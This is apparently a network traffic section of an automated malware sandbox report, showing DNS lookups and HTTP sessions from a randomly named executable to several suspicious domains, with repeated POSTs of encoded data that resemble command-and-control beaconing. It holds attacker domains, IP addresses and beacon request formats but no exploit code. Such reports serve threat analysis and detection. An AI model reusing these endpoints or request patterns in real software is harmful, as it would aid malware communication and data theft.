                                                        Nov 7, 2024 15:51:35.638514996 CET1.1.1.1192.168.2.100x48f9No error (0)www.lnnn.fun188.114.97.3A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:51:49.825793028 CET1.1.1.1192.168.2.100x8b0No error (0)www.7153115.xyz103.249.106.91A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:52:03.711690903 CET1.1.1.1192.168.2.100xfed1No error (0)www.tingba.sbs172.67.202.10A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:52:03.711690903 CET1.1.1.1192.168.2.100xfed1No error (0)www.tingba.sbs104.21.22.22A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:52:18.536149025 CET1.1.1.1192.168.2.100x7af9No error (0)www.jllllbx.top156.234.28.94A (IP address)IN (0x0001)false
                                                        Nov 7, 2024 15:52:18.536604881 CET1.1.1.1192.168.2.100x7af9No error (0)www.jllllbx.top156.234.28.94A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.lexjetcenter.net
                                                        • www.elarac.top
                                                        • www.budged.net
                                                        • www.5hdgb2p9a.buzz
                                                        • www.j252mv.site
                                                        • www.lnnn.fun
                                                        • www.7153115.xyz
                                                        • www.tingba.sbs
                                                        • www.jllllbx.top

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.10499733.33.130.190806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:50:20.273966074 CET520OUTGET /ugdo/?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.lexjetcenter.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:50:22.133512974 CET394INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Thu, 07 Nov 2024 14:50:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 254
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 4c 2d 78 3d 6b 78 4a 33 6f 64 33 32 35 58 71 6f 38 77 78 51 31 68 42 67 52 36 53 44 6d 32 44 79 4a 33 77 74 65 43 45 49 2f 44 69 47 4f 76 4d 75 48 4b 58 64 46 51 76 56 37 4b 70 4a 66 38 78 4e 57 4e 63 47 64 6f 71 30 68 42 77 52 66 70 34 50 74 63 70 51 63 4a 59 63 71 56 6d 36 68 55 53 6c 7a 69 33 44 4c 69 4c 42 71 61 58 51 6d 54 42 69 68 6e 38 33 30 77 3d 3d 26 77 46 56 48 3d 2d 7a 77 54 4b 50 46 30 69 50 74 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth"}</script></head></html>
                                                        Nov 7, 2024 15:50:22.133559942 CET394INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Thu, 07 Nov 2024 14:50:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 254
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 4c 2d 78 3d 6b 78 4a 33 6f 64 33 32 35 58 71 6f 38 77 78 51 31 68 42 67 52 36 53 44 6d 32 44 79 4a 33 77 74 65 43 45 49 2f 44 69 47 4f 76 4d 75 48 4b 58 64 46 51 76 56 37 4b 70 4a 66 38 78 4e 57 4e 63 47 64 6f 71 30 68 42 77 52 66 70 34 50 74 63 70 51 63 4a 59 63 71 56 6d 36 68 55 53 6c 7a 69 33 44 4c 69 4c 42 71 61 58 51 6d 54 42 69 68 6e 38 33 30 77 3d 3d 26 77 46 56 48 3d 2d 7a 77 54 4b 50 46 30 69 50 74 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.1049974192.64.118.221806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:50:37.962073088 CET764OUTPOST /favd/ HTTP/1.1
                                                        Host: www.elarac.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.elarac.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.elarac.top/favd/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 62 76 49 4e 43 45 32 2b 41 74 31 53 73 6b 6d 37 66 2f 41 74 52 6f 42 2b 6b 7a 66 59 51 52 4b 50 47 65 41 79 71 42 43 4c 67 47 45 4f 31 65 2b 4a 61 6c 73 37 34 47 55 63 73 46 50 62 52 42 2b 35 5a 49 76 55 70 59 70 50 68 4c 6e 2f 6e 58 67 72 62 37 59 78 4d 78 6d 31 63 79 2f 77 54 45 70 4e 36 77 79 59 57 58 2f 39 31 65 48 43 77 6b 73 78 78 2f 54 51 72 57 4c 50 42 50 59 39 62 68 2f 30 78 39 43 6f 56 43 57 38 63 57 49 32 75 71 33 77 2b 35 4c 6a 42 51 30 37 63 6d 4c 63 71 37 67 6c 35 78 34 6f 72 55 2b 2f 38 4e 51 7a 35 50 58 37 38 48 63 77 71 72 30 42 33 55 6e 55
                                                        Data Ascii: eL-x=bvINCE2+At1Sskm7f/AtRoB+kzfYQRKPGeAyqBCLgGEO1e+Jals74GUcsFPbRB+5ZIvUpYpPhLn/nXgrb7YxMxm1cy/wTEpN6wyYWX/91eHCwksxx/TQrWLPBPY9bh/0x9CoVCW8cWI2uq3w+5LjBQ07cmLcq7gl5x4orU+/8NQz5PX78Hcwqr0B3UnU
                                                        Nov 7, 2024 15:50:38.646874905 CET533INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:50:38 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.1049975192.64.118.221806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:50:40.648349047 CET788OUTPOST /favd/ HTTP/1.1
                                                        Host: www.elarac.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.elarac.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.elarac.top/favd/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 62 76 49 4e 43 45 32 2b 41 74 31 53 74 42 32 37 63 59 30 74 41 34 42 2f 67 44 66 59 66 78 4b 44 47 65 45 79 71 45 69 62 68 31 67 4f 30 2b 75 4a 62 6e 45 37 30 6d 55 63 6d 6c 50 65 66 68 2b 69 5a 49 79 33 70 5a 6c 50 68 4c 7a 2f 6e 57 51 72 48 59 67 32 4e 68 6d 33 64 43 2f 49 4c 6b 70 4e 36 77 79 59 57 54 58 48 31 65 50 43 77 58 30 78 78 61 7a 54 6f 57 4c 41 52 66 59 39 66 68 2b 2f 78 39 43 47 56 47 4f 53 63 56 77 32 75 75 37 77 2b 4d 6e 67 57 67 31 79 53 47 4c 4f 71 72 67 71 7a 44 51 50 79 56 4f 32 67 2b 34 73 2b 75 71 38 74 57 39 6e 35 63 6f 50 35 53 53 2b 67 4f 47 66 74 68 35 42 55 46 43 76 41 6e 52 30 49 6b 43 69 4c 41 3d 3d
                                                        Data Ascii: eL-x=bvINCE2+At1StB27cY0tA4B/gDfYfxKDGeEyqEibh1gO0+uJbnE70mUcmlPefh+iZIy3pZlPhLz/nWQrHYg2Nhm3dC/ILkpN6wyYWTXH1ePCwX0xxazToWLARfY9fh+/x9CGVGOScVw2uu7w+MngWg1ySGLOqrgqzDQPyVO2g+4s+uq8tW9n5coP5SS+gOGfth5BUFCvAnR0IkCiLA==
                                                        Nov 7, 2024 15:50:41.329152107 CET533INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:50:41 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.1049976192.64.118.221806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:50:43.223819971 CET1801OUTPOST /favd/ HTTP/1.1
                                                        Host: www.elarac.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.elarac.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.elarac.top/favd/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 62 76 49 4e 43 45 32 2b 41 74 31 53 74 42 32 37 63 59 30 74 41 34 42 2f 67 44 66 59 66 78 4b 44 47 65 45 79 71 45 69 62 68 31 6f 4f 30 49 69 4a 61 41 59 37 31 6d 55 63 6c 6c 50 66 66 68 2f 36 5a 49 71 72 70 5a 35 78 68 4a 4c 2f 6d 77 73 72 4c 35 67 32 48 68 6d 33 57 69 2f 7a 54 45 70 59 36 78 44 66 57 58 7a 48 31 65 50 43 77 52 59 78 32 50 54 54 75 57 4c 50 42 50 59 4c 62 68 2f 59 78 39 61 77 56 47 61 73 64 6b 51 32 76 4f 72 77 38 61 54 67 55 41 31 77 56 47 4b 64 71 72 74 71 7a 44 4d 44 79 56 36 4d 67 2b 51 73 38 34 76 63 34 69 35 52 71 4e 55 4b 39 30 47 76 71 71 69 65 30 42 5a 64 63 77 75 6b 43 54 38 43 42 6d 6a 63 58 53 43 65 38 73 52 79 41 58 34 35 73 68 4e 39 6f 46 76 53 54 36 65 76 30 4b 4d 6f 35 4e 52 51 51 71 4a 79 4c 42 4d 45 63 2f 30 4a 61 39 64 4f 36 55 52 58 58 6a 48 75 6a 58 2f 51 6e 44 79 59 6c 78 52 54 6f 6a 65 41 6a 50 36 30 75 44 74 30 69 2f 49 77 61 5a 46 44 6d 2b 33 36 4b 70 45 37 62 31 6a 48 76 44 71 43 69 4e 6c 69 41 47 59 53 64 61 54 47 6c 6d 30 69 75 62 33 74 36 [TRUNCATED]
                                                        Data Ascii: eL-x=bvINCE2+At1StB27cY0tA4B/gDfYfxKDGeEyqEibh1oO0IiJaAY71mUcllPffh/6ZIqrpZ5xhJL/mwsrL5g2Hhm3Wi/zTEpY6xDfWXzH1ePCwRYx2PTTuWLPBPYLbh/Yx9awVGasdkQ2vOrw8aTgUA1wVGKdqrtqzDMDyV6Mg+Qs84vc4i5RqNUK90Gvqqie0BZdcwukCT8CBmjcXSCe8sRyAX45shN9oFvST6ev0KMo5NRQQqJyLBMEc/0Ja9dO6URXXjHujX/QnDyYlxRTojeAjP60uDt0i/IwaZFDm+36KpE7b1jHvDqCiNliAGYSdaTGlm0iub3t6luABDX0f/13WVgkuUmHtHGIeBkG7/hobI1lm5TC1j0X9rvmy0a7H146gJsv3tawaAnhh+uxsTxTKbU2+SUcKS7MxXOzaGehr7lTrxMxdS3EMXEYKepTZkcg33piQZsCFZb5ZbMqaqpRhj8e3h0Gv0HMDiiC5K+qoDFDyRx0m7mhrrftpy+O1utYqyLHq/QzUYdBatck/GOuHu6rAcON5U8gM5mIxysEOqoxugQ7jEEf+sH+i2P4Bjx3MFvVRhgdpdEnA7XFCclOfC+ibvXrC/6e1BRzNCqzwrbOljjScUG/0txUaWew23OlVeJ+Z58J4WBppI1VN+NvtJv0O7WS9L8KOZe/1r0lpQBtnrHFkIPBCtoAjA6QWlS5avxHFDPFJpksixeIU1dlD6/braPOkMTLZP1AL1jdz1JoHJTpiX1VMT9P4QLjhUlS9918QYiSQqTq+JJzqQod5jlMux+GfEw4d70xInU8abzDjQsrcHB0Rq4NxULTc5KdsWhuQdFHpPWLSYCtFOq3TRs8jolq1qdO3brk/3cI925fdMDMSU1k9eSPyHUKAKpoDCq0hjxgGMYtSdsUBU+Z+F3acpV5N4a/ic6nkwDOHaJOk3JejVs0eMoOOJpPtT15PtdVyAwHwD2qEGShBsHcE9wyP0+ZSxXd5shk2ZiNGwA [TRUNCATED]
                                                        Nov 7, 2024 15:50:43.877651930 CET533INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:50:43 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.1049977192.64.118.221806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:50:45.798866987 CET514OUTGET /favd/?wFVH=-zwTKPF0iPth&eL-x=WtgtBzW4FsxMnQSuWOIYSeEoiXDfOi+mEu8byEiY5V0Es9uEUQhozXoYk37/fSn7c76G5+FTj9P/4AI0dbo7dAuFWhjyFRNqxijvASv2x9K31F87tg== HTTP/1.1
                                                        Host: www.elarac.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:50:46.482928991 CET548INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:50:46 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.1049978195.154.200.15806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:50:52.097975016 CET764OUTPOST /zslv/ HTTP/1.1
                                                        Host: www.budged.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.budged.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.budged.net/zslv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4a 57 50 58 6a 4b 79 71 6f 51 47 4a 71 52 30 79 50 77 35 34 37 44 2b 4e 2f 65 77 59 6a 54 5a 6a 4c 30 38 55 31 7a 32 69 4e 54 54 41 6a 68 36 76 45 61 57 52 56 47 4d 35 38 30 54 66 5a 6d 46 68 44 61 31 55 30 35 32 34 62 41 37 6e 34 33 46 70 4a 31 79 77 5a 4f 51 69 68 58 49 52 73 55 6e 31 71 4d 39 77 64 77 46 48 44 54 39 78 31 39 52 71 2b 50 57 49 62 42 66 6a 4e 45 51 64 52 34 65 6b 50 59 6e 31 6a 61 4f 78 6b 6e 44 65 57 51 52 55 74 6b 77 61 30 43 76 30 49 45 50 59 62 64 6d 67 41 67 4b 54 48 63 67 30 53 2f 58 6c 32 50 48 4d 65 70 58 58 53 66 54 70 62 33 71 33
                                                        Data Ascii: eL-x=JWPXjKyqoQGJqR0yPw547D+N/ewYjTZjL08U1z2iNTTAjh6vEaWRVGM580TfZmFhDa1U0524bA7n43FpJ1ywZOQihXIRsUn1qM9wdwFHDT9x19Rq+PWIbBfjNEQdR4ekPYn1jaOxknDeWQRUtkwa0Cv0IEPYbdmgAgKTHcg0S/Xl2PHMepXXSfTpb3q3


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.1049979195.154.200.15806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:50:54.643986940 CET788OUTPOST /zslv/ HTTP/1.1
                                                        Host: www.budged.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.budged.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.budged.net/zslv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4a 57 50 58 6a 4b 79 71 6f 51 47 4a 72 77 45 79 4b 54 68 34 39 6a 2b 43 77 2b 77 59 36 44 5a 6e 4c 30 67 55 31 79 44 6c 4e 46 37 41 67 41 4b 76 46 62 57 52 53 47 4d 35 30 55 54 65 55 47 46 63 44 61 35 32 30 34 4b 34 62 42 66 6e 34 7a 42 70 4f 47 61 33 4c 75 51 67 6f 33 49 54 78 6b 6e 31 71 4d 39 77 64 77 42 68 44 54 56 78 31 4e 68 71 2f 75 57 50 54 68 66 67 45 6b 51 64 56 34 65 67 50 59 6e 58 6a 59 32 4c 6b 68 48 65 57 56 74 55 75 78 45 62 74 79 76 49 4d 45 50 4e 61 4a 72 71 48 43 33 72 47 38 4d 56 48 73 6a 78 78 75 36 4c 50 34 32 41 42 6f 50 6e 56 78 66 64 51 50 66 6e 32 70 44 4c 2b 66 78 70 36 6b 55 48 50 75 39 71 32 51 3d 3d
